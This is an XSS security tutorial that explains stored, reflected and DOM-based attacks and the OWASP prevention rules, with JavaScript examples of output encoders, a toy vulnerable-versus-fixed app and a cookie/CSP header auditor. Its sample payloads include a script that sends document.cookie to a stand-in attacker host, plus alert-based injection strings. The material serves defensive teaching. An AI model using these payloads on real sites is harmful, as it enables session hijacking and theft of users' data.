
Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise trusted web sites. The name breaks down into three parts:
 * Scripting
 * Cross-Site
 * Attack
 Scripting:
 Web browsers can execute commands
◦ Embedded in an HTML page
◦ Several languages are supported (JavaScript, VBScript, ActiveX, etc.)
◦ Most prominent: JavaScript

 "Cross-Site" means:
 Foreign script sent via the server to the client
◦ The attacker "makes" the web server deliver malicious script code
◦ The malicious script is executed in the client's web browser, with the privileges the browser grants the vulnerable site (its cookies, its DOM, its session)

 Attack:
◦ Steal access credentials, denial of service, modify web pages
◦ Execute arbitrary script in the client's browser in the context of the vulnerable site
* XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user.
* Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
* Malicious JavaScript can be used for all sorts of malicious tasks.
* It can be used to steal users' cookies, allowing someone to use the website while pretending to be that user (session hijacking), unless the session cookie is marked HttpOnly and therefore unreadable from script.
Preconditions:
* A web application accepts user input.
* The input is used to create dynamic content.
* The input is insufficiently validated or encoded.

Parties involved:
* An attacker and a client (the victim's browser)
* A company's web server (i.e., the web application)
* In order to run malicious JavaScript code in a victim's browser, an attacker must first find a way to inject a payload into a web page that the victim visits.
* Of course, an attacker could use social engineering techniques to convince a user to visit a vulnerable page with an injected JavaScript payload.
* In order for an XSS attack to take place, the vulnerable website needs to directly include user input in its pages. An attacker can then insert a string that will be used within the web page and treated as code by the victim's browser.
* The XSS attack's first target is the client
◦ The client trusts the server (does not expect an attack)
◦ The browser executes the malicious script

* But the second target is the company running the server
◦ Loss of public image (blame)
◦ Loss of customer trust
◦ Loss of money
There are certain rules for preventing XSS (these are the rules of the OWASP XSS Prevention Cheat Sheet; each rule is tied to the output context the untrusted data is placed in). They are:
RULE #0 - Never insert untrusted data except in allowed locations
RULE #1 - HTML-escape before inserting untrusted data into HTML element content
RULE #2 - Attribute-escape before inserting untrusted data into HTML common attributes
RULE #3 - JavaScript-escape before inserting untrusted data into JavaScript data values
RULE #4 - CSS-escape and strictly validate before inserting untrusted data into HTML style property values
RULE #5 - URL-escape before inserting untrusted data into HTML URL parameter values
RULE #6 - Sanitize HTML markup with a library designed for the job
RULE #7 - Prevent DOM-based XSS
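The rules above only work if the encoder matches the context. The following is an added example (not code from the slides, and not OWASP's own library) that implements encoders for rules #1, #2, #3 and #5 and shows, with a constructed payload, why the element-content encoder is not enough inside an unquoted attribute. All function names and sample inputs are this example's own.

```javascript
// Added example, not code from the original slides: context-aware output
// encoders in the spirit of OWASP rules #1, #2, #3 and #5, and a demonstration
// of why the element-content encoder is not enough inside an unquoted
// attribute. Function names and sample inputs are this example's own.

// Rule #1: HTML element content. Escaping these characters is sufficient here.
function encodeForHtml(s) {
  return String(s).replace(/[&<>"'\/]/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;",
    '"': "&quot;", "'": "&#x27;", "/": "&#x2F;",
  })[c]);
}

// Rule #2: HTML attribute values. Encode every non-alphanumeric character below
// U+0100 as &#xHH; so whitespace, '=' and quotes can never end the attribute or
// start a new one, even when the template author forgot the quotes.
function encodeForHtmlAttribute(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const cp = c.codePointAt(0);
    return cp < 256 ? "&#x" + cp.toString(16).toUpperCase().padStart(2, "0") + ";" : c;
  });
}

// Rule #3: JavaScript string values. \xHH / \uHHHH escapes cannot close the
// quote, end the statement or terminate the <script> block.
function encodeForJavaScript(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const cp = c.codePointAt(0);
    const hex = cp.toString(16).toUpperCase();
    return cp < 256 ? "\\x" + hex.padStart(2, "0") : "\\u" + hex.padStart(4, "0");
  });
}

// Rule #5: URL parameter values. encodeURIComponent is the right primitive;
// it is NOT a substitute for validating the scheme of a whole URL (javascript:).
function encodeForUrl(s) {
  return encodeURIComponent(String(s));
}

// One untrusted value placed in four different contexts, each with its own encoder.
function renderProfile(untrusted) {
  return [
    `<p>Hello, ${encodeForHtml(untrusted)}</p>`,
    `<div title=${encodeForHtmlAttribute(untrusted)}>profile</div>`, // unquoted on purpose
    `<script>var who = '${encodeForJavaScript(untrusted)}';</script>`,
    `<a href="/search?q=${encodeForUrl(untrusted)}">search</a>`,
  ].join("\n");
}

// Wrong-context failure: the body encoder leaves spaces and '=' alone, so in an
// unquoted attribute the attacker simply appends an event-handler attribute.
const ATTRIBUTE_PAYLOAD = "x onmouseover=alert(1)"; // constructed sample input
function addsAttribute(encodedValue) {
  return /\s\w+=/.test(encodedValue); // a second name=value pair survived encoding
}

function demo() {
  return {
    bodyEncoderInAttribute: addsAttribute(encodeForHtml(ATTRIBUTE_PAYLOAD)),            // true: broken out
    attributeEncoderInAttribute: addsAttribute(encodeForHtmlAttribute(ATTRIBUTE_PAYLOAD)), // false
    page: renderProfile("<img src=x onerror=alert(document.cookie)>"),
  };
}

console.log(demo().page);
```

Note the design choice behind rule #2: the attribute encoder is deliberately aggressive (everything non-alphanumeric) because the template may omit the quotes; the element-content encoder can afford to be minimal because the only way out of text content is a `<`. In production code use a maintained encoding library rather than hand-written encoders, but the context distinction stays the same.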
There are three types of XSS. They are:
* Stored XSS,
* Reflected XSS and
* DOM-based XSS.

* The most damaging type of XSS is Stored (Persistent) XSS.
* Stored XSS attacks involve an attacker injecting a script that is permanently stored on the target application (for example in a database, message forum, visitor log or comment field) and is served to every user who later views the affected page.
* In Reflected XSS, the attacker's payload script has to be part of the request which is sent to the web server and is reflected back in such a way that the HTTP response includes the payload from the HTTP request; the victim therefore has to be lured into sending the crafted request, e.g. by clicking a link.
* DOM-based XSS is an advanced type of XSS attack which is made possible when the web application's client-side scripts write user-provided data to the Document Object Model (DOM).
* If the data is incorrectly handled, an attacker can inject a payload which will be stored as part of the DOM and executed when the page's own script reads it back and writes it into the DOM as markup.
* The most dangerous part of DOM-based XSS is that the attack is often a purely client-side attack: the attacker's payload is never sent to the server, so server-side filtering, logging and web application firewalls never see it.

Exercise: log in to WebGoat and navigate to the Cross Site Scripting (XSS) section. Let us execute a Stored Cross Site Scripting (XSS) attack. Below is the snapshot of the scenario.
[Screenshot of the WebGoat stored XSS scenario; not reproduced in this extract]
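The difference between the three types is easiest to see as data flow. The following is an added example (not code from the slides and not WebGoat) with a tiny in-memory guestbook and search page: the "app", its routes, the payload and the duck-typed DOM element are all this example's own constructions, and there is no network, so rendering is a pure function of state.

```javascript
// Added example, not code from the slides or from WebGoat: a minimal in-memory
// "web app" that makes stored vs. reflected XSS visible as data flow, plus a
// DOM-based sink shown with a duck-typed element. App, routes and payload are
// constructed for this example.

const PAYLOAD = "<script>new Image().src='http://attacker.invalid/?c='+document.cookie</script>";

// Minimal HTML element-content escaper (rule #1 of the prevention rules).
function htmlEscape(s) {
  return String(s).replace(/[&<>"']/g, (c) =>
    ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" })[c]);
}

// encodeOutput=false is the vulnerable app (raw concatenation), true is the fixed one.
function makeApp({ encodeOutput }) {
  const comments = []; // server-side store, shared by all visitors
  const enc = encodeOutput ? htmlEscape : (s) => s;
  return {
    // POST /comment: stored XSS, the payload lands in the shared store
    postComment(author, text) { comments.push({ author, text }); },
    // GET /guestbook: served to every later visitor, attacker no longer involved
    getGuestbook() {
      return "<ul>" + comments.map((c) => `<li><b>${enc(c.author)}</b>: ${enc(c.text)}</li>`).join("") + "</ul>";
    },
    // GET /search?q=...: reflected XSS, the payload only appears in the response
    // to the request that carried it, so the victim must be made to send it
    getSearch(q) {
      return `<h1>Results for "${enc(q)}"</h1><p>No results.</p>`;
    },
  };
}

// Crude but sufficient check for a live <script> element in rendered HTML.
function containsLiveScript(html) {
  return /<script[\s>]/i.test(html);
}

// Walk through both attack flows against the vulnerable or the fixed app.
function scenario(encodeOutput) {
  const app = makeApp({ encodeOutput });
  // Stored: attacker posts once...
  app.postComment("mallory", PAYLOAD);
  // ...and every later visitor's page contains it.
  const victimGuestbook = app.getGuestbook();
  // Reflected: a victim's own, ordinary request is clean...
  const victimOwnSearch = app.getSearch("holiday photos");
  // ...the payload only fires if the victim follows the attacker's crafted link.
  const craftedLink = "/search?q=" + encodeURIComponent(PAYLOAD);
  const qFromLink = decodeURIComponent(craftedLink.split("?q=")[1]);
  const victimFollowsLink = app.getSearch(qFromLink);
  return {
    storedHits: containsLiveScript(victimGuestbook),
    reflectedWithoutLink: containsLiveScript(victimOwnSearch),
    reflectedViaLink: containsLiveScript(victimFollowsLink),
  };
}

// DOM-based: same idea, but the sink is in the browser and the server never sees
// the payload. Shown with a duck-typed element so it runs here too; in a page,
// `el` would be document.getElementById(...) and `hashValue` location.hash.slice(1).
function greetFromHash(el, hashValue, safe) {
  if (safe) el.textContent = "Welcome " + hashValue; // data stays data
  else el.innerHTML = "Welcome " + hashValue;        // data is parsed as markup
  return el;
}

console.log("vulnerable:", scenario(false)); // { storedHits: true, reflectedWithoutLink: false, reflectedViaLink: true }
console.log("fixed:     ", scenario(true));  // all false
```

The vulnerable run shows the practical difference: the stored payload reaches every visitor without any further attacker action, while the reflected one needs the victim to send the crafted request. The fixed app changes nothing about the flow, it only encodes at the output, which is why output encoding rather than input filtering is the primary defence.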
XSS is not a harmless flaw!

* Access to authentication credentials for the web application
  Cookies, username and password
* Normal users
  Access to personal data (credit card, bank account)
* Highly privileged users
  Control over the web application (an administrator's session gives the attacker the administrator's rights)
* Denial of service
  Crash the user's browser, pop-up flooding, redirection
* Access to the user's machine
  Use ActiveX objects to control the machine (requires a browser or plugin weakness; modern browsers no longer support ActiveX)
* Spoil the public image of the company
  Redirect to a dialer download
Defensive measures:
* Contextual output encoding/escaping of string input
* Safely validating untrusted HTML input
* Cookie security (HttpOnly, Secure, SameSite)
* Disabling scripts
* Emerging defensive technologies
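Cookie security and the newer browser-side defences are both set through HTTP response headers, so they can be audited from a single response. The following is an added example, not from the slides: a small checker for the Set-Cookie attributes that keep a session cookie out of reach of an XSS payload and for a Content-Security-Policy header, which is what this editor takes the slide's "emerging defensive technologies" to refer to. The two sample responses are constructed for the example and the finding texts are its own.

```javascript
// Added example, not code from the slides: audit the response headers that
// implement "cookie security" and Content-Security-Policy. The sample header
// sets below are constructed, not captured from a real site.

function parseSetCookie(line) {
  const [nameValue, ...attrs] = line.split(";").map((p) => p.trim());
  const name = nameValue.split("=")[0];
  const flags = new Map();
  for (const a of attrs) {
    const [k, v] = a.split("=");
    flags.set(k.toLowerCase(), v === undefined ? true : v);
  }
  return { name, flags };
}

// A session cookie is what an XSS payload wants from document.cookie:
// HttpOnly keeps script from reading it, Secure keeps it off plaintext HTTP,
// SameSite limits when the browser sends it cross-site.
function auditCookie(line) {
  const { name, flags } = parseSetCookie(line);
  const findings = [];
  if (!flags.has("httponly")) findings.push(`${name}: missing HttpOnly, readable via document.cookie`);
  if (!flags.has("secure")) findings.push(`${name}: missing Secure`);
  const ss = flags.get("samesite");
  if (!ss || String(ss).toLowerCase() === "none") findings.push(`${name}: SameSite absent or None`);
  return findings;
}

// CSP is the browser-side control that stops an injected <script> from running
// even when the encoding bug is there. 'unsafe-inline' undoes that, unless a
// nonce or hash is present (then browsers ignore 'unsafe-inline').
function auditCsp(value) {
  if (!value) return ["no Content-Security-Policy header: injected inline script is not restricted"];
  const findings = [];
  const directives = new Map(value.split(";").map((d) => d.trim()).filter(Boolean)
    .map((d) => { const [n, ...src] = d.split(/\s+/); return [n.toLowerCase(), src]; }));
  const scriptSrc = directives.get("script-src") || directives.get("default-src") || [];
  if (scriptSrc.length === 0) findings.push("CSP has neither script-src nor default-src");
  const hasNonceOrHash = scriptSrc.some((s) => /^'(nonce-|sha(256|384|512)-)/.test(s));
  if (scriptSrc.includes("'unsafe-inline'") && !hasNonceOrHash)
    findings.push("CSP allows 'unsafe-inline' scripts without a nonce or hash, so injected <script> still runs");
  if (scriptSrc.includes("*")) findings.push("script-src allows scripts from any origin (*)");
  return findings;
}

// headers: lowercase header names, set-cookie as an array (as Node's http gives them)
function auditHeaders(headers) {
  const findings = [];
  for (const c of headers["set-cookie"] || []) findings.push(...auditCookie(c));
  findings.push(...auditCsp(headers["content-security-policy"]));
  return findings;
}

// Constructed sample responses.
const WEAK_RESPONSE = {
  "set-cookie": ["SESSIONID=abc123; Path=/"],
  "content-security-policy": "default-src 'self'; script-src 'self' 'unsafe-inline'",
};
const HARDENED_RESPONSE = {
  "set-cookie": ["SESSIONID=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"],
  "content-security-policy": "default-src 'self'; script-src 'self' 'nonce-r4nd0m'; object-src 'none'",
};

console.log("weak:", auditHeaders(WEAK_RESPONSE));         // 4 findings
console.log("hardened:", auditHeaders(HARDENED_RESPONSE)); // []
```

A practical caveat: HttpOnly stops cookie theft, not XSS itself; an injected script can still act on the user's behalf from inside the page. That is why the encoding rules come first and the headers are defence in depth.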
Summary:
* Cross-Site Scripting is extremely dangerous
* Cause: missing or insufficient input validation and, above all, missing output encoding
* XSS: apply the prevention best practices above
